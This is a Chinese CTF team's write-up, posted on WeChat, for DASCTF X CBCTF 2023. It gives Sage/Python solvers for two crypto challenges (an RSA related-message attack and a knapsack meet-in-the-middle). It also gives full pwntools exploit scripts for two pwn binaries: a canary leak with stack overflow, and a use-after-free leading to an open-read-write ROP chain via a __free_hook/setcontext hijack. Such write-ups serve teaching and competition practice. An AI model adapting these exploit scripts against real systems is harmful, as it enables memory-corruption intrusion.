EDI
JOIN US ▶▶▶
招新
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn方向的师傅)有意向的师傅请联系邮箱[email protected]、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
01
Crypto
1
ezrsa
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2023/10/21 11:31
import binascii
from sage.all import *
n1 = 65634094430927080732256164808833233563732628654160389042977689628512527168256899310662239009610512772020503283842588142453533499954947692968978190310627721338357432052800695091789711809256924541784954080619073213358228083200846540676931341013554634493581962527475555869292091755676130810562421465063412235309
n2 = 103670293685965841863872863719573676572683187403862749665555450164387906552249974071743238931253290278574192713467491802940810851806104430306195931179902098180199167945649526235613636163362672777298968943319216325949503045377100235181706964846408396946496139224344270391027205106691880999410424150216806861393
(e1, noise1, c1) = (1743, 44560588075773853612820227436439937514195680734214431948441190347878274184937952381785302837541202705212687700521129385632776241537669208088777729355349833215443048466316517110778502508209433792603420158786772339233397583637570006255153020675167597396958251208681121668808253767520416175569161674463861719776, 65643009354198075182587766550521107063140340983433852821580802983736094225036497335607400197479623208915379722646955329855681601551282788854644359967909570360251550766970054185510197999091645907461580987639650262519866292285164258262387411847857812391136042309550813795587776534035784065962779853621152905983)
(e2, noise2, c2) = (1325, 35282006599813744140721262875292395887558561517759721467291789696459426702600397172655624765281531167221787036009507833425145071265739486735993631460189629709591456017092661028839951392247601628468621576100035700437892164435424035004463142959219067199451575338270613300215815894328788753564798153516122567683, 50327632090778183759544755226710110702046850880299488259739672542025916422119065179822210884622225945376465802069464782311211031263046593145733701591371950349735709553105217501410716570601397725812709771348772095131473415552527749452347866778401205442409443726952960806789526845194216490544108773715759733714)
enc = 124349762993424531697403299350944207725577290992189948388824124986066269514204313888980321088629462472088631052329128042837153718129149149661961926557818023704330462282009415874674794190206220980118413541269327644472633791532767765585035518183177197863522573410860341245613331398610013697803459403446614221369
def attack(c1, c2, e1,e2,noise1,noise2,n2):
PR = PolynomialRing(Zmod(n2), name='x')
x = PR.gen()
g1 = (x + noise1) ** e1 - c1
g2 = (x + noise2) ** e2 - c2
def gcd(g1, g2):
while g2:
g1, g2 = g2, g1 % g2
return g1.monic()
return -gcd(g1, g2)[0]
m1 = attack(c1,c2,e1,e2,noise1,noise2,n2)
print(m1)
p=13189337905641321257372188436353844418280745284875462357019668708167547026960641869513283218672677712590326347601424108528959315675307896082223561007980457
with open("enc.txt","r") as f:
cipher=f.read()
c1=[]
ci=cipher.split("n")
c=[]
for t in ci:
try:
t=int(t)
c.append(t)
except:
pass
q=""
for s in c:
if jacobi_symbol(s,n1)==1:
q +="1"
else:
q+="0"
print(int(q[::-1],2))
q=int(q[::-1],2)
moduls=p*q
phi=(p-1)*(q-1)
import gmpy2
d=gmpy2.invert(65537,phi)
print(d)
d=int(d)
m=pow(enc,d,moduls)
from Crypto.Util.number import *
print(long_to_bytes(m))
2
CBbackpack
每6位一组,一共8组,一共48位
每组0,1各有3个,一共有$C^3_6$=20种可能
利用中间相遇攻击爆破
l=[65651991706497, 247831871690373, 120247087605020, 236854536567393, 38795708921144, 256334857906663, 120089773523233, 165349388120302, 123968326805899, 79638234559694, 259559389823590, 256776519514651, 107733244474073, 216508566448440, 39327578905012, 118682486932022, 263357223061004, 132872609024098, 44605761726563, 24908360451602, 237906955893793, 204469770496199, 7055254513808, 221802659519968, 169686619990988, 23128789035141, 208847144870760, 272339624469135, 269511404473473, 112830627321371, 73203551744776, 42843503010671, 118193938825623, 49625220390324, 230439888723036, 241486656550572, 107149406378865, 233503862264755, 269502011971514, 181805192674559, 152612003195556, 184127512098087, 165959151027513, 188723045133473, 241615906682300, 216101484550038, 81190147709444, 124498742419309]
x=4051501228761632
import itertools
ll=[]
for i in range(8):
tt=itertools.combinations(l[i*6:6*(i+1)],3)
t=[sum(j) for j in tt]
ll.append(t)
ll1=ll[:4]
ll2=ll[4:]
llll1=[]
for i in ll1[0]:
for j in ll1[1]:
for k in ll1[2]:
for s in ll1[3]:
llll1.append(i+j+k+s)
llll2=[]
for i in ll2[0]:
for j in ll2[1]:
for k in ll2[2]:
for s in ll2[3]:
llll2.append(i+j+k+s)
llll2=[x-i for i in llll2]
for i in range(36600,len(llll1)):
print(i)
if llll1[i] in llll2:
print(i,llll2.index(llll1[i]))
a,b=[i],[llll2.index(llll1[i])]
a=divmod(a[0],20)
a=divmod(a[0],20)+a[1:]
a=divmod(a[0],20)+a[1:]
b=divmod(b[0],20)
b=divmod(b[0],20)+b[1:]
b=divmod(b[0],20)+b[1:]
ab=a+b
break
# ...
# 36690 141524
assert sum([ll[i][ab[i]] for i in range(8)])==x
index=list(itertools.combinations([0,1,2,3,4,5],3))
q=[index[i] for i in ab]
ml=[]
for i in q:
mll=[0]*6
for j in i:
mll[j]=1
ml+=mll
import hashlib
flag = 'DASCTF{'+hashlib.sha256(''.join([str(i) for i in ml]).encode()).hexdigest()+'}'
print(flag)
02
Pwn
1
Guestbook
泄露canary 后栈溢出。
from pwn import *
#from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['tmux','splitw','-h']
filename = './GuestBook'
debug = 0
ip = 'node4.buuoj.cn'
port = 26998
if debug:
p = process(filename)
else:
p = remote(ip,port)
ru = lambda a: p.recvuntil(a)
r = lambda n: p.recv(n)
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
l32 = lambda :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))
l64 = lambda :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'x00'))
int16 = lambda data :int(data,16)
lg = lambda s, num :p.success('%s -> 0x%x' % (s, num))
def inter() : p.interactive()
def debu(cmd=''):
gdb.attach(p,cmd)
pause()
def get_addr():
return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))
def get_sysbin(libc_base,libc):
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
def csu(rdi, rsi, rdx, rip, gadget) :
return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
sla(b'name: ',b'a'*24)
ru(b'a'*24)
canary = u64(r(0x8))
print("canary :",hex(canary))
#debu('b *0x40143f')
sla(b'leave(MAX 4): ',b'4')
for i in range(2):
sl(b'aaaa')
payload = b'b'*(0x38+0x20)+p64(canary+0x6)+b'c'*0x8+p64(0x00000000004012c0)
sl(payload)
sl(b'b'*0x38+b'x00')
inter()
2
EASYBOX
3
Binding
这一题在比赛期间没有做出来,非常可惜,感觉最后就差一点点,就是临门一脚的事情,所以赛后又花了点时间仔细看了看这道题,花了一个多小时就出了,难度算比较中等水平,主要是中间卡了很长一段时间。
这一题漏洞也非常简单,一是UAF 漏洞。
基本思路就是:
1.通过UAF漏洞来泄露 libc
的基地址,接着得到 environ
地址以此泄露栈地址,然后通过栈地址来泄露出 ELF
基地址。(一开始是尝试通过 environ+0x20
来泄露出 ELF
基地址,但是打印会被截断,寄 ),show 函数来泄露堆地址。
2.通过edit 函数修改EDIT_TIME为0xff
,使得可以任意次数修改。
3.在栈上构造ORW的ROP链。(当时快结束时,已经做完这一步,但是main
居然没有正常返回,然后无了)
4.最后在 free_hook 地址位置写上 setcontext+0x3d ,使得跳转到构造的ROP链上。
from pwn import *
#from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['tmux','splitw','-h']
filename = './binding'
debug = 0
ip = '127.0.0.1'
port = 9999
libc = ELF('/home/roach/glibc-patcher/libs/amd64/2.31-0ubuntu9.9_amd64/libc.so.6')
if debug:
p = process(filename)
else:
p = remote(ip,port)
ru = lambda a: p.recvuntil(a)
r = lambda n: p.recv(n)
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
l32 = lambda :u32(p.recvuntil(b'xf7')[-4:].ljust(4,b'x00'))
l64 = lambda :u64(p.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'x00'))
int16 = lambda data :int(data,16)
lg = lambda s, num :p.success('%s -> 0x%x' % (s, num))
def inter() : p.interactive()
def debu(cmd=''):
gdb.attach(p,cmd)
pause()
def get_addr():
return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))
def get_sysbin(libc_base,libc):
return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))
def csu(rdi, rsi, rdx, rip, gadget) :
return p64(gadget) + p64(0) + p64(1) + p64(rip) + p64(rdi) + p64(rsi) + p64(rdx) + p64(gadget - 0x1a)
def add(idx,size,content):
sla(b'choice:',b'1')
sla(b'Idx:',str(idx).encode())
sla(b'Size:',str(size).encode())
sa(b'Content:',content)
def edit(idx,content1,content2):
sla(b'choice:',b'2')
sla(b'Idx:',str(idx).encode())
sa(b'context1: n',content1)
sa(b'context2: n',content2)
def show(idx,choice):
sla(b'choice:',b'3')
sla(b'choice:',choice)
sla(b'Idx:',str(idx).encode())
def delete(idx):
sla(b'choice:',b'4')
sla(b'Idx:',str(idx).encode())
for i in range(0xb):
add(i,0x150,b'a'*8)
for i in range(0x8):
delete(i)
show(7,b'0')
ru(b'context: ')
leak = get_addr()
print("leak : ",hex(leak))
libc_base = leak - 0x1ecbe0
print("libc_base : ",hex(libc_base))
stack_addr = libc_base+libc.sym['environ']
print("stack address : ",hex(stack_addr))
payload = b'a'*(0x150+0x8)+p64(0x110)+p64(stack_addr)
add(0xb,0x1e0,payload)
show(7,b'0')
ru(b'context: ')
stack = get_addr()-0x100
print("stack : ",hex(stack))
delete(8)
payload = b'a'*(0x1d0+0x8)+p64(0x110)+p64(stack-0x20)
add(0xc,0x200,payload)
show(8,b'0')
ru(b'context: ')
elf_base = u64(r(6).ljust(8, b'x00'))-0x1990
print("elf_base : ",hex(elf_base))
#debu('b show')
show(0xb,b'1')
r(9)
heap = u64(r(6).ljust(8, b'x00'))
print("heap : ",hex(heap))
edit(9,p64(elf_base+0x4010),p64(0xff))
pop_rdi = elf_base+0x0000000000001a13
pop_rsi = libc_base+0x000000000002601f
pop_rdx = libc_base+0x0000000000142c92
openfile = libc_base+libc.sym['open']
readfile = libc_base+libc.sym['read']
writefile = libc_base+libc.sym['write']
exits = libc_base+libc.sym['exit']
payload = p64(heap+0xbf0)+p64(pop_rsi)+p64(0x0)+p64(openfile)
payload += p64(pop_rdi)+p64(0x3)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x100)+p64(readfile)
payload += p64(pop_rdi)+p64(0x1)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x100)+p64(writefile)
payload += p64(pop_rdi)+p64(0x0)+p64(exits)
'''
0x0000000000151990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
'''
for i in range(len(payload)):
edit(9,p64(stack+i),payload[i:i+1].ljust(8,b'x00'))
free_hook = libc_base+libc.sym['__free_hook']
setcontext = libc_base+libc.sym['setcontext']+0x3d
magic_gadgets = libc_base+0x0000000000151990
#debu('b *$rebase(0x16a0)')
for i in range(8):
edit(9,p64(free_hook+i),p64(magic_gadgets)[i:i+1].ljust(8,b'x00'))
#0xe -> address = heap+0xbe0
payload2 = p64(0x0)+p64(heap+0xbe0)+b'./flagx00x00'+p64(0x0)+p64(setcontext)
payload2 = payload2.ljust(0xa0,b'x00')
payload2 = payload2+p64(stack)+p64(pop_rdi)
add(0xd,0x150,payload2)
print("setcontext : ",hex(setcontext))
print("magic gadgets :",hex(magic_gadgets))
print("free hook :",hex(free_hook))
print("libc_base : ",hex(libc_base))
print("stack : ",hex(stack))
print("elf_base : ",hex(elf_base))
print("heap : ",hex(heap))
#debu()
delete(0xd)
inter()
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论